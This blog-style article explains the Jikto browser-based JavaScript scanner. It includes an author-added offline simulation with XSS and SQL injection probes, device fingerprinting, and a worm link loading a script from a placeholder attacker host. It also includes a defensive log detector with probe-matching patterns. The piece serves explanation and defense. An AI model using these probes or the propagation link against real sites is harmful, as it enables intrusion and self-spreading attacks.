Jikto: Malware 2.0


Billy Hoffman

Regardless of whether you’re into technology or not, you’ve probably heard various horror stories of how hackers have managed to commandeer the PCs of unsuspecting users to do their bidding. Traditionally a hacker would need to get a malicious piece of software – a.k.a. viruses and spyware – onto the intended victim’s machine before anything harmful could take place. Most computer users are aware of these dangers and have taken steps to prevent infection, such as installing anti-virus and anti-spyware software. The vast majority of users also sit behind some sort of inbound filtering, be it a NAT router or even the standard Windows Firewall. Having these measures in place, along with some good computing habits, like not opening random links in e-mails, probably saves many users a lot of potential hassle, and most likely also provides some peace of mind. Notice, though, what those measures actually cover: files that land on disk and connections that arrive from the outside. Neither looks at the requests your own browser makes on your behalf. Well, those comfortable days are over, because there’s a new hack in town.

A few weeks ago at the ShmooCon conference, Billy Hoffman, lead security researcher at SPI Dynamics, showed the security community a tool he had developed that can turn any machine, running any JavaScript-capable browser, on any operating system, into an attack platform. The program, named Jikto, is a piece of JavaScript that can be embedded in any Web page and runs silently as soon as the page loads. Jikto does not rely on a bug in the browser; it only uses what JavaScript is already allowed to do, which is why no patch makes it go away.

Let’s start off with an example. With Jikto, a hacker could potentially scan a corporate network and “fingerprint all the Web-enabled devices found and send attacks or commands to those devices,” without any interference from a firewall, since all of this runs directly from the browser of a machine that is already inside the network. To the firewall this traffic is perfectly acceptable: it is an outbound request from a trusted internal host, indistinguishable from the user clicking a link. Continuing with Hoffman’s example, once a hacker figures out the router brand and model, it is fairly trivial to send it a few requests to reconfigure it, say to turn off encryption or change the administrator password. And, to make matters worse, because every request originates from the victim’s own PC, the logs will show an internal address, which can fool the IT techs into thinking that the attack came from an insider instead of from a hacker thousands of miles away.

So how exactly is Jikto supposed to do all this? Once a casual Internet surfer visits a site that has Jikto embedded in it, the JavaScript executes. Jikto essentially takes over that browser and turns it into a scanning tool that probes other websites for cross-site scripting or SQL injection vulnerabilities and reports any findings back to a third party, probably a hacker. (A page is normally blocked by the browser’s same-origin policy from reading responses from other sites, so Jikto routes its requests through a public proxy service; Hoffman’s demonstration used Google Translate for this.) Once a target is located, the hacker can inject code of his choosing into the vulnerable website. That code then runs in the browsers of everyone who visits the site, including employees inside the company’s network, and from there it can reach a specific Web-enabled device on that network.

Not only can Jikto find and report cross-site scripting and SQL injection vulnerabilities, it can also self-propagate, much like a worm, using the same cross-site scripting holes it discovers: it plants a copy of its own loader in a vulnerable page, and from that new location it infects and commandeers the browsers of other unsuspecting visitors. Since Jikto only takes over the browser, does so silently without alerting the user, and never writes a file to disk or touches any other part of the machine, signature-based anti-virus has nothing to scan, which is a large part of the reason traditional security applications have a hard time catching it.
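To make the two paragraphs above concrete, here is the drone-side workflow in plain JavaScript. This is an added example written for this post, not Jikto’s source, and it is deliberately simplified. The network layer is passed in as a `fetcher(url)` function returning `{status, headers, body}` so the code runs offline under Node; in a real browser that layer would be XMLHttpRequest plus a cross-domain proxy. The device signatures, target hosts, probe strings and the `attacker.example` loader URL are all made up for the illustration.

```javascript
// Added example (not Jikto's code): fingerprint the intranet, probe web
// targets for reflected XSS and error-based SQLi, and build the worm link.

// Constructed fingerprint table: banners an intranet scan might see.
const DEVICE_SIGNATURES = [
  { device: "example-router", test: (r) => /realm="Example Router"/i.test(r.headers["www-authenticate"] || "") },
  { device: "example-printer", test: (r) => /<title>Example Printer/i.test(r.body) },
];

// Candidate gateway addresses and ports an intranet scan would start from.
function buildIntranetPlan(hosts = ["192.168.0.1", "192.168.1.1", "10.0.0.1"], ports = [80, 8080]) {
  const urls = [];
  for (const host of hosts) for (const port of ports) urls.push(`http://${host}:${port}/`);
  return urls;
}

// Identify a device from its response; null when nothing matched.
function fingerprint(response) {
  const hit = DEVICE_SIGNATURES.find((s) => s.test(response));
  return hit ? hit.device : null;
}

// Reflected-XSS probe: a marker with angle brackets that comes back unencoded
// means the page echoes input into HTML without escaping it.
const XSS_PROBE = "<jkto>";
// Error-based SQLi probe: a lone quote that provokes a database error message.
const SQLI_PROBE = "'";
const SQL_ERRORS = [/error in your SQL syntax/i, /unclosed quotation mark/i, /ORA-\d{5}/, /pg_query\(\)/i];

function probeParam(url, param, fetcher) {
  const findings = [];
  const xss = fetcher(`${url}?${param}=${encodeURIComponent(XSS_PROBE)}`);
  if (xss.body.includes(XSS_PROBE)) findings.push({ type: "xss", url, param });
  const sqli = fetcher(`${url}?${param}=${encodeURIComponent(SQLI_PROBE)}`);
  if (SQL_ERRORS.some((re) => re.test(sqli.body))) findings.push({ type: "sqli", url, param });
  return findings;
}

// Worm step: turn a reflected-XSS finding into a link that loads the scanner
// again in whoever opens it. loaderUrl is a placeholder for the attacker's host.
function propagationUrl(finding, loaderUrl) {
  const payload = `<script src="${loaderUrl}"></script>`;
  return `${finding.url}?${finding.param}=${encodeURIComponent(payload)}`;
}

// One drone's run: fingerprint the intranet, probe the assigned web targets,
// and return the report that would be posted back to the controller.
function runScan(webTargets, fetcher, hosts) {
  const devices = [];
  for (const url of buildIntranetPlan(hosts)) {
    const r = fetcher(url);
    if (r.status === 0) continue; // nothing listening there
    const device = fingerprint(r);
    if (device) devices.push({ url, device });
  }
  const findings = [];
  for (const { url, param } of webTargets) findings.push(...probeParam(url, param, fetcher));
  return { devices, findings };
}

// Constructed responses standing in for the network (no real hosts involved).
// Note: encodeURIComponent leaves the single quote unencoded, hence the "?q='" key.
const FAKE_NET = {
  "http://192.168.1.1:80/": { status: 401, headers: { "www-authenticate": 'Basic realm="Example Router"' }, body: "" },
  "http://10.0.0.1:80/": { status: 200, headers: {}, body: "<html><title>Example Printer</title></html>" },
  "http://target.example/search?q=%3Cjkto%3E": { status: 200, headers: {}, body: "<p>Results for <jkto></p>" },
  "http://target.example/search?q='": { status: 200, headers: {}, body: "<p>Results for '</p>" },
  "http://target.example/item?id=%3Cjkto%3E": { status: 200, headers: {}, body: "<p>Item &lt;jkto&gt; not found</p>" },
  "http://target.example/item?id='": { status: 500, headers: {}, body: "You have an error in your SQL syntax near ''' at line 1" },
};
function fakeFetcher(url) {
  return FAKE_NET[url] || { status: 0, headers: {}, body: "" };
}

const report = runScan(
  [{ url: "http://target.example/search", param: "q" }, { url: "http://target.example/item", param: "id" }],
  fakeFetcher
);
console.log(JSON.stringify(report, null, 2));
console.log(propagationUrl(report.findings[0], "http://attacker.example/jikto.js"));

module.exports = { buildIntranetPlan, fingerprint, probeParam, propagationUrl, runScan, fakeFetcher };
```

Two details worth noticing: the `/item` page escapes the marker (`&lt;jkto&gt;`) and so is not reported as XSS even though its database error gives away an injection, and the whole run consists of nothing but ordinary GET requests, which is exactly why a firewall or an anti-virus product sees nothing to object to.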

So, at the center of this potentially devastating tool is Web 2.0, or more specifically, the ubiquitous use of JavaScript to enable AJAX—a programming technique designed to make sites more interactive; think Digg.com. On the one hand, it may seem surprising that a tool like Jikto took so long to appear, since JavaScript has been used for almost a decade now, and the vulnerabilities it hunts for are certainly nothing new. But then again, a tool like Jikto can only be truly effective if a great number of sites require JavaScript, forcing users to leave it enabled. The success of Jikto depends on the number of PCs it can be run on, much like BitTorrent in a sense. As Steve Gibson explains, “Jikto runs in a web browser and distributes the bug-hunting task across multiple PCs.” What makes Jikto so dangerous is that it is effectively invisible to current anti-malware solutions, which look for malicious files and inbound connections, not for a page’s own script traffic. The only sure way of stopping what Jikto is capable of would be to browse without JavaScript enabled, or at least to allow it only on sites you trust. Unfortunately, turning it off outright would break a vast number, if not the majority, of websites today. Even for a simple blog, such as this one, to work correctly JavaScript has to be enabled.
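Since the client side offers little leverage, the practical place to catch a Jikto-style run is on the servers it probes. Each drone’s requests look like ordinary user traffic; the tell is in aggregate, the same probe strings hitting the same parameter from many unrelated client addresses. The following is an added example written for this post, not from the article, SPI Dynamics or Steve Gibson: it parses Apache combined-format log lines (constructed here, with documentation-range IP addresses), URL-decodes each query parameter, flags classic XSS and SQL injection fragments, and reports only parameters probed from at least `minSources` distinct addresses. The patterns are illustrative, not a complete signature set.

```javascript
// Added example (not from the article): spot distributed XSS/SQLi probing in
// web server logs by counting distinct sources per probed path+parameter.

const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+/;

// Illustrative probe fragments, matched against the URL-decoded value.
const PROBE_PATTERNS = [
  { name: "xss", re: /<\s*(script|img|svg|iframe)\b|javascript:|\bon\w+\s*=/i },
  { name: "sqli", re: /(^|[^\w])'(\s*(or|and)\b|\s*--|\s*$)|\bunion\s+select\b|\bor\s+1\s*=\s*1\b/i },
];

// Decode a query component; malformed escapes are kept as-is rather than dropped.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, " ")); } catch (e) { return s; }
}

// Parse one combined-format line into its parts, or null if it does not match.
function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, ts, method, target, status] = m;
  const [path, query = ""] = target.split("?", 2);
  const params = [];
  for (const kv of query.split("&")) {
    if (!kv) continue;
    const [k, v = ""] = kv.split("=", 2);
    params.push({ name: safeDecode(k), value: safeDecode(v) });
  }
  return { ip, ts, method, path, status: Number(status), params };
}

// "xss", "sqli" or null for a single decoded parameter value.
function classify(value) {
  const hit = PROBE_PATTERNS.find((p) => p.re.test(value));
  return hit ? hit.name : null;
}

// Group probe hits by path+param+kind and keep groups seen from at least
// minSources distinct addresses: the distributed pattern, not one noisy client.
function findDistributedProbing(lines, minSources = 3) {
  const groups = new Map();
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    for (const { name, value } of req.params) {
      const kind = classify(value);
      if (!kind) continue;
      const key = `${req.path} ${name} ${kind}`;
      if (!groups.has(key)) groups.set(key, { path: req.path, param: name, kind, sources: new Set(), hits: 0 });
      const g = groups.get(key);
      g.sources.add(req.ip);
      g.hits += 1;
    }
  }
  return [...groups.values()]
    .filter((g) => g.sources.size >= minSources)
    .map((g) => ({ path: g.path, param: g.param, kind: g.kind, sources: g.sources.size, hits: g.hits }));
}

// Constructed sample log: three drones probe /search for XSS, two probe /item
// for SQLi, plus two benign requests (one containing an innocent apostrophe).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Apr/2007:10:01:02 -0400] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
  '198.51.100.7 - - [10/Apr/2007:10:01:09 -0400] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
  '192.0.2.44 - - [10/Apr/2007:10:01:15 -0400] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
  '203.0.113.5 - - [10/Apr/2007:10:02:00 -0400] "GET /item?id=1%27%20OR%201%3D1 HTTP/1.1" 500 120',
  '198.51.100.7 - - [10/Apr/2007:10:02:30 -0400] "GET /item?id=1%27%20OR%201%3D1 HTTP/1.1" 500 120',
  '192.0.2.44 - - [10/Apr/2007:10:03:00 -0400] "GET /search?q=shmoocon HTTP/1.1" 200 900',
  '203.0.113.9 - - [10/Apr/2007:10:03:10 -0400] "GET /search?q=o%27reilly HTTP/1.1" 200 900',
];

console.log(findDistributedProbing(SAMPLE_LOG));

module.exports = { parseLine, classify, findDistributedProbing, SAMPLE_LOG };
```

With the default threshold of three sources only the `/search` XSS probing is reported; the `/item` injection attempts came from two addresses and would need a lower threshold (or more log) to surface, and the apostrophe in `o'reilly` is correctly left alone. In practice the threshold and the time window both need tuning, but the shape of the rule is what matters: Jikto’s strength, spreading the work across many PCs, is also its signature.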

The reason that Jikto has managed to garner so much attention in the last few weeks is that it’s a very clever way of scanning for vulnerabilities using a language that practically any browser can understand—even certain cell phone browsers will succumb to its will. In the words of Billy Hoffman, “Jikto is going to drastically change the scope of evil things you can do with JavaScript.” Continuing on, he states that “Jikto turns any PC into my little drone. Your PC will start attacking websites on my behalf, and you’re going to give me all of the results.” Coming from white-hat hacker Billy Hoffman, this probably sounds more sadistic than it really is, since he has refrained from releasing Jikto into the wild. Unfortunately, there have already been reports of sightings of Jikto’s source code. The eventual appearance of Jikto, or rather some program like it, is pretty much inevitable. Once the hacker community knows that the technique works and how to implement it, writing a program to take advantage of it is really quite trivial.

For more information about the risks of JavaScript-based attacks, check out Steve Gibson’s podcast Security Now! and also take a look at the webcasts from SPI Dynamics.
